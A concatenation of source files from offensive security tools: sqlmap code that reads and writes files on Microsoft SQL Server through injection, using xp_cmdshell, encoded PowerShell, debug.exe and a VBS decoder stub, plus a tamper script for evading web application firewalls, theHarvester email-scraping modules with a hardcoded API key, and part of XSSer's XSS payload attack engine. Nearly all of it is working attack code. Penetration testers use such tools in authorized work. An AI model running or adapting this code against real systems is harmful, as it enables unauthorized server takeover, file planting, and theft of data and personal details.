logger.debug("loading the content of file '%s' into support table" % rFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s', please wait.." % dFile
logger.info(infoMsg)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
encodedFileContent = hexencode(wFileContent)
# TODO: need to be fixed
psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile)
psString = psString.encode('utf-16le')
psString = psString.encode("base64")[:-1].replace("\n", "")
logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("converting the file utilizing PowerShell EncodedCommand")
commands = ("cd %s" % tmpPath,
"powershell -EncodedCommand %s" % psString,
"del /F /Q %s" % randFilePath)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00
if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
debugMsg += "it chunk by chunk and recreate the original file "
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s"
outputFilePath = "%s"
Set fs = CreateObject("Scripting.FileSystemObject")
Set file = fs.GetFile(inputFilePath)
If file.Size Then
Wscript.Echo "Loading from: " & inputFilePath
Wscript.Echo
Set fd = fs.OpenTextFile(inputFilePath, 1)
data = fd.ReadAll
fd.Close
data = Replace(data, " ", "")
data = Replace(data, vbCr, "")
data = Replace(data, vbLf, "")
Wscript.Echo "Fixed Input: "
Wscript.Echo data
Wscript.Echo
decodedData = base64_decode(data)
Wscript.Echo "Output: "
Wscript.Echo decodedData
Wscript.Echo
Wscript.Echo "Writing output in: " & outputFilePath
Wscript.Echo
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
ofs.Write decodedData
ofs.close
Else
Wscript.Echo "The file is empty."
End If
Function base64_decode(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If Not w2 Then _
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If Not w3 Then _
strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If Not w4 Then _
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
Next
base64_decode = strOut
End Function
Function mimedecode(byVal strIn)
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
Else
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function""" % (randFilePath, dFile)
vbs = vbs.replace(" ", "")
encodedFileContent = wFileContent.encode("base64")[:-1]
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd %s" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile)
with open(wFile, "rb") as f:
wFileContent = f.read()
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "another technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
#self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
return written
```
#### File: dbms/sybase/connector.py
```python
try:
import _mssql
import pymssql
except ImportError:
pass
import logging
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector):
"""
Homepage: http://pymssql.sourceforge.net/
User guide: http://pymssql.sourceforge.net/examples_pymssql.php
API: http://pymssql.sourceforge.net/ref_pymssql.php
Debian package: python-pymssql
License: LGPL
Possible connectors: http://wiki.python.org/moin/SQL%20Server
Important note: pymssql library on your system MUST be version 1.0.2
to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/
"""
def __init__(self):
GenericConnector.__init__(self)
def connect(self):
self.initConnection()
try:
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
except pymssql.OperationalError, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()
def fetchall(self):
try:
return self.cursor.fetchall()
except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
return None
def execute(self, query):
retVal = False
try:
self.cursor.execute(utf8encode(query))
retVal = True
except (pymssql.OperationalError, pymssql.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " "))
except pymssql.InternalError, msg:
raise SqlmapConnectionException(msg)
return retVal
def select(self, query):
retVal = None
if self.execute(query):
retVal = self.fetchall()
try:
self.connector.commit()
except pymssql.OperationalError:
pass
return retVal
```
#### File: sqlmap/tamper/space2dash.py
```python
import random
import string
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def tamper(payload, **kwargs):
"""
Replaces space character (' ') with a dash comment ('--') followed by
a random string and a new line ('\n')
Requirement:
* MSSQL
* SQLite
Notes:
* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge,
https://proton.onsec.ru/contest/
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))
retVal += "--%s%%0A" % randomStr
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
```
#### File: theHarvester/discovery/googleprofilesearch.py
```python
import time
import httplib
import myparser
import sys
from search_results import *
class search_google_profiles:
def __init__(self,word,options):
self.word=word
self.files="pdf"
self.total_results=u""
self.server="www.google.com"
self.server_api="www.googleapis.com"
self.hostname="www.google.com"
self.userAgent="(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
self.quantity=100
self.limit=options.limit
self.counter=options.start
self.api_key="AIzaSyBuBomy0n51Gb4836isK2Mp65UZI_DrrwQ"
def do_search_profiles(self):
h = httplib.HTTP(self.server)
h.putrequest('GET', '/search?num='+ str(self.quantity) + '&start=' + str(self.counter) + '&hl=en&meta=&q=site:www.google.com%20intitle:"Google%20Profile"%20"Companies%20I%27ve%20worked%20for"%20"at%20' + self.word + '"')
h.putheader('Host', self.hostname)
h.putheader('User-agent', self.userAgent)
h.endheaders()
returncode, returnmsg, response_headers = h.getreply()
encoding=response_headers['content-type'].split('charset=')[-1]
self.total_results+=unicode(h.getfile().read(), encoding)
def process(self):
print "[-] Searching Google Profiles:"
while self.counter < self.limit:
self.do_search_profiles()
time.sleep(0.3)
self.counter+=self.quantity
print "\r\tProcessed "+ str(self.counter) + " results..."
def get_results(self):
raw_results=myparser.parser(self.total_results,self.word)
results = search_results()
results.people = raw_results.profiles()
return results
```
#### File: theHarvester/discovery/googlesearch.py
```python
import httplib
import myparser
import time
from search_results import *
import sys
class search_google:
def __init__(self,word,options):
self.word=word
self.total_results=u""
self.server="www.google.com"
self.hostname="www.google.com"
self.userAgent="(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
self.quantity=100 # the number to retrieve at once
self.limit=options.limit
self.counter=options.start
def do_search(self):
h = httplib.HTTP(self.server)
h.putrequest('GET', "/search?num="+str(self.quantity)+"&start=" + str(self.counter) + "&hl=en&meta=&q=%40\"" + self.word + "\"")
h.putheader('Host', self.hostname)
h.putheader('User-agent', self.userAgent)
h.endheaders()
returncode, returnmsg, response_headers = h.getreply()
encoding=response_headers['content-type'].split('charset=')[-1]
self.total_results+=unicode(h.getfile().read(), encoding)
def process(self):
print "[-] Searching Google:"
while self.counter < self.limit and self.counter <= 1000:
self.do_search()
time.sleep(1)
self.counter+=self.quantity
print "\r\tProcessed "+ str(self.counter) + " results..."
def get_results(self):
raw_results=myparser.parser(self.total_results,self.word)
results = search_results()
results.emails = raw_results.emails()
results.hostnames = raw_results.hostnames()
return results
```
#### File: xsser/XSSer/main.py
```python
import os, re, sys, datetime, hashlib, time, urllib, cgi, traceback, webbrowser
import XSSer.fuzzing
import XSSer.fuzzing.vectors
import XSSer.fuzzing.DCP
import XSSer.fuzzing.DOM
import XSSer.fuzzing.HTTPsr
import XSSer.fuzzing.heuristic
from collections import defaultdict
from itertools import islice, chain
from XSSer.curlcontrol import Curl
from XSSer.encdec import EncoderDecoder
from XSSer.options import XSSerOptions
from XSSer.dork import Dorker
from XSSer.crawler import Crawler
from XSSer.post.shorter import ShortURLReservations
from XSSer.imagexss import ImageInjections
from XSSer.flashxss import FlashInjections
from XSSer.publish import publisher
from XSSer.post.xml_exporter import xml_reporting
from XSSer.tokenhub import HubThread
from XSSer.reporter import XSSerReporter
from XSSer.threadpool import ThreadPool, NoResultsPending
# set to emit debug messages about errors (0 = off).
DEBUG = 1
class xsser(EncoderDecoder, XSSerReporter):
"""
XSSer application class
"""
def __init__(self, mothership=None):
self._reporter = None
self._reporters = []
self._landing = False
self._ongoing_requests = 0
self._oldcurl = []
self._gtkdir = None
self._webbrowser = webbrowser
self.crawled_urls = []
self.checked_urls = []
self.successfull_urls = []
self.urlmalformed = False
# deploy your swarm (default: grey swarm!)"
# this parameters are connected to the GTK interface (swarm tab)
self.sn_service = 'https://identi.ca'
self.sn_username = 'xsserbot01'
self.sn_password = '<PASSWORD>'
self.sn_url = 'http://identi.ca/api/statuses/update.xml'
if not mothership:
# no mothership so *this* is the mothership
# start the communications hub and rock on!
self.hub = None
self.pool = ThreadPool(0)
self.mothership = None
self.final_attacks = {}
else:
self.hub = None
self.mothership = mothership
self.mothership.add_reporter(self)
self.pool = ThreadPool(0)
self.final_attacks = self.mothership.final_attacks
#self.pool = None
# initialize the url encoder/decoder
EncoderDecoder.__init__(self)
# your unique real opponent
self.time = datetime.datetime.now()
# this payload comes with vector already..
#self.DEFAULT_XSS_PAYLOAD = "<img src=x onerror=alert('XSS')>"
self.DEFAULT_XSS_PAYLOAD = 'XSS'
#self.DEFAULT_XSS_VECTOR = '">PAYLOAD'
self.DEFAULT_XSS_VECTOR = ''
# to be or not to be...
self.hash_found = []
self.hash_notfound = []
# other hashes
self.hashed_payload = []
self.url_orig_hash = []
# some counters for checker systems
self.errors_isalive = 0
self.next_isalive = False
self.flag_isalive_num = 0
#self.errors_jumper = 0
#self.next_jumper = False
# some controls about targets
self.urlspoll = []
# some statistics counters for connections
self.success_connection = 0
self.not_connection = 0
self.forwarded_connection = 0
self.other_connection = 0
# some statistics counters for payloads
self.xsr_injection = 0
self.xsa_injection = 0
self.coo_injection = 0
self.manual_injection = 0
self.auto_injection = 0
self.dcp_injection = 0
self.dom_injection = 0
self.httpsr_injection = 0
self.check_positives = 0
# some statistics counters for injections founded
self.xsr_founded = 0
self.xsa_founded = 0
self.coo_founded = 0
self.manual_founded = 0
self.auto_founded = 0
self.dcp_founded = 0
self.dom_founded = 0
self.httpsr_founded = 0
self.false_positives = 0
# some statistics counters for heuristic parameters
self.heuris_backslash_founded = 0
self.heuris_une_backslash_founded = 0
self.heuris_dec_backslash_founded = 0
self.heuris_backslash_notfounded = 0
self.heuris_slash_founded = 0
self.heuris_une_slash_founded = 0
self.heuris_dec_slash_founded = 0
self.heuris_slash_notfounded = 0
self.heuris_mayor_founded = 0
self.heuris_une_mayor_founded = 0
self.heuris_dec_mayor_founded = 0
self.heuris_mayor_notfounded = 0
self.heuris_minor_founded = 0
self.heuris_une_minor_founded = 0
self.heuris_dec_minor_founded = 0
self.heuris_minor_notfounded = 0
self.heuris_semicolon_founded = 0
self.heuris_une_semicolon_founded = 0
self.heuris_dec_semicolon_founded = 0
self.heuris_semicolon_notfounded = 0
self.heuris_colon_founded = 0
self.heuris_une_colon_founded = 0
self.heuris_dec_colon_founded = 0
self.heuris_colon_notfounded = 0
self.heuris_doublecolon_founded = 0
self.heuris_une_doublecolon_founded = 0
self.heuris_dec_doublecolon_founded = 0
self.heuris_doublecolon_notfounded = 0
self.heuris_equal_founded = 0
self.heuris_une_equal_founded = 0
self.heuris_dec_equal_founded = 0
self.heuris_equal_notfounded = 0
# xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
self.verbose = 2
self.options = None
def __del__(self):
if not self._landing:
self.land()
def get_gtk_directory(self):
if self._gtkdir:
return self._gtkdir
local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
'gtk')
if os.path.exists(local_path):
self._gtkdir = local_path
return self._gtkdir
elif os.path.exists('/usr/share/xsser/gtk'):
self._gtkdir = '/usr/share/xsser/gtk'
return self._gtkdir
def set_webbrowser(self, browser):
self._webbrowser = browser
def set_reporter(self, reporter):
self._reporter = reporter
def add_reporter(self, reporter):
self._reporters.append(reporter)
def remove_reporter(self, reporter):
if reporter in self._reporters:
self._reporters.remove(reporter)
def generate_hash(self, attack_type='default'):
"""
generate a new hash for a type of attack.
"""
return hashlib.md5(str(datetime.datetime.now()) + attack_type).hexdigest()
def report(self, msg, level='info'):
"""
Report some error from the application.
levels: debug, info, warning, error
"""
if self.verbose == 2:
prefix = ""
if level != 'info':
prefix = "["+level+"] "
print msg
elif self.verbose:
if level == 'error':
sys.stdout.write("*")
else:
sys.stdout.write(".")
for reporter in self._reporters:
reporter.post(msg)
if self._reporter:
from twisted.internet import reactor
reactor.callFromThread(self._reporter.post, msg)
def set_options(self, options):
"""
Set xsser options
"""
self.options = options
self._opt_request()
def _opt_request(self):
"""
Pass on some properties to Curl
"""
options = self.options
for opt in ['cookie', 'agent', 'referer',\
'headers', 'atype', 'acred', 'acert',
'proxy', 'ignoreproxy', 'timeout',
'delay', 'tcp_nodelay', 'retries',
'xforw', 'xclient', 'threads',
'dropcookie', 'followred', 'fli',
'nohead', 'isalive', 'alt', 'altm',
'ald', 'jumper'
]:
if hasattr(options, opt) and getattr(options, opt):
setattr(Curl, opt, getattr(options, opt))
# attack functions
def get_payloads(self):
"""
Process payload options and make up the payload list for the attack.
"""
options = self.options
# payloading sources
payloads_fuzz = XSSer.fuzzing.vectors.vectors
payloads_dcp = XSSer.fuzzing.DCP.DCPvectors
payloads_dom = XSSer.fuzzing.DOM.DOMvectors
payloads_httpsr = XSSer.fuzzing.HTTPsr.HTTPrs_vectors
manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
# sustitute payload for hash to check false positives
self.hashed_payload = self.generate_hash('url')
checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
# heuristic parameters
heuristic_params = XSSer.fuzzing.heuristic.heuristic_test
def enable_options_heuristic(payloads):
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
return payloads
if options.fuzz:
payloads = payloads_fuzz
if options.dcp:
payloads = payloads + payloads_dcp
if options.script:
payloads = payloads + manual_payload
if options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.script:
payloads = payloads + manual_payload
if options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payaloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.hash:
payloads = checker_payload + payloads
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.dcp:
payloads = payloads_dcp
if options.script:
payloads = payloads + manual_payload
if options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + inducedcode
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.script:
payloads = manual_payload
if options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
paylaods = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads_httpsr
if options.hash:
payloads = checker_payload + payloads
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params
if options.hash:
payloads = checker_payload + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads_dom
elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
payloads = [{"payload":'">PAYLOAD',
"browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
}]
else:
payloads = checker_payload
return payloads
def process_ipfuzzing(self, text):
"""
Mask ips in given text to DWORD
"""
ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
for ip in ips:
text = text.replace(ip, str(self._ipDwordEncode(ip)))
return text
def process_ipfuzzing_octal(self, text):
"""
Mask ips in given text to Octal
"""
ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
for ip in ips:
text = text.replace(ip, str(self._ipOctalEncode(ip)))
return text
def process_payloads_ipfuzzing(self, payloads):
"""
Mask ips for all given payloads using DWORD
"""
# ip fuzzing (DWORD)
if self.options.Dwo:
resulting_payloads = []
for payload in payloads:
payload["payload"] = self.process_ipfuzzing(payload["payload"])
resulting_payloads.append(payload)
return resulting_payloads
return payloads
def process_payloads_ipfuzzing_octal(self, payloads):
"""
Mask ips for all given payloads using OCTAL
"""
# ip fuzzing (OCTAL)
if self.options.Doo:
resulting_payloads = []
for payload in payloads:
payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
resulting_payloads.append(payload)
return resulting_payloads
return payloads
def get_query_string(self):
"""
Get the supplied query string.
"""
if self.options.postdata:
return self.options.postdata
elif self.options.getdata:
return self.options.getdata
return ""
def attack_url(self, url, payloads, query_string):
"""
Attack the given url, checking or not, if is alive.
"""
if self.options.nohead:
for payload in payloads:
self.attack_url_payload(url, payload, query_string)
else:
hc = Curl()
try:
urls = hc.do_head_check([url])
except:
print "Target url: (" + url + ") is malformed" + " [DISCARDED]" + "\n"
return
if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
if str(hc.info()["http-code"]) in ["301"]:
url = str(hc.info()["Location"])
payload = ""
query_string = ""
elif str(hc.info()["http-code"]) in ["302"]:
url = url + "/"
payload = ""
query_string = ""
print "\nHEAD alive check for the target: (" + url + ") is OK" + "(" + hc.info()["http-code"] + ") [AIMED]\n"
self.success_connection = self.success_connection + 1
for payload in payloads:
self.attack_url_payload(url, payload, query_string)
else:
print "\nHEAD alive check for the target: (" + url + ") is FAILED(" + hc.info()["http-code"] + ") [DISCARDED]" + "\n"
self.not_connection = self.not_connection + 1
def get_url_payload(self, url, payload, query_string, attack_payload=None):
"""
Attack the given url with the given payload
"""
options = self.options
self._ongoing_attacks = {}
# get payload/vector
payload_string = payload['payload'].strip()
# if PHPIDS (>0.6.5) exploit is invoked
if options.phpids:
payload_string = 32*payload_string + payload_string
# substitute the attack hash
url_orig_hash = self.generate_hash('url')
payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
hashed_payload = payload_string.replace('XSS', url_orig_hash)
if attack_payload:
# url for real attack
hashed_vector_url = self.encoding_permutations(attack_payload)
else:
# test
hashed_vector_url = self.encoding_permutations(hashed_payload)
self._ongoing_attacks['url'] = url_orig_hash
if 'VECTOR' in url:
# this url comes with vector included
dest_url = url.strip().replace('VECTOR', hashed_vector_url)
else:
payload_url = query_string.strip() + hashed_vector_url
if not query_string and not url.strip().endswith("/"):
dest_url = url.strip() + '/' + payload_url
else:
dest_url = url.strip() + payload_url
return dest_url, url_orig_hash
def attack_url_payload(self, url, payload, query_string):
if not self.pool:
pool = self.mothership.pool
else:
pool = self.pool
c= Curl()
def _cb(request, result):
self.finish_attack_url_payload(c, request, result, payload,
query_string, url, newhash)
_error_cb = self.error_attack_url_payload
def _error_cb(request, error):
self.error_attack_url_payload(c, url, request, error)
if self.options.getdata or not self.options.postdata:
dest_url, newhash = self.get_url_payload(url, payload, query_string)
#self.report(dest_url)
self._prepare_extra_attacks()
pool.addRequest(c.get, [dest_url], _cb, _error_cb)
self._ongoing_requests += 1
#c.get(dest_url)
if self.options.postdata:
dest_url, newhash = self.get_url_payload("", payload, query_string)
dest_url = dest_url.strip().replace("/", "", 1)
self.report("\nSending POST:", query_string, "\n")
data = c.post(url, dest_url)
self._prepare_extra_attacks()
pool.addRequest(c.get, [dest_url], _cb, _error_cb)
self._ongoing_requests += 1
#c.post(url, dest_url)
def error_attack_url_payload(self, c, url, request, error):
self._ongoing_requests -= 1
for reporter in self._reporters:
reporter.mosquito_crashed(url, str(error[0]))
dest_url = request.args[0]
self.report("Failed attempt (URL Malformed!?): " + url + "\n")
self.urlmalformed = True
#self.report(self.urlmalformed)
if self.urlmalformed == True and self.urlspoll[0] == url:
self.land()
self.report(str(error[0]))
if DEBUG:
traceback.print_tb(error[2])
c.close()
del c
return
def finish_attack_url_payload(self, c, request, result, payload,
query_string, url, orig_hash):
#if self.next_jumper == True:
# self.next_jumper = False
# return
#else:
self.report('='*75)
self.report("Target: " + url + " --> " + str(self.time))
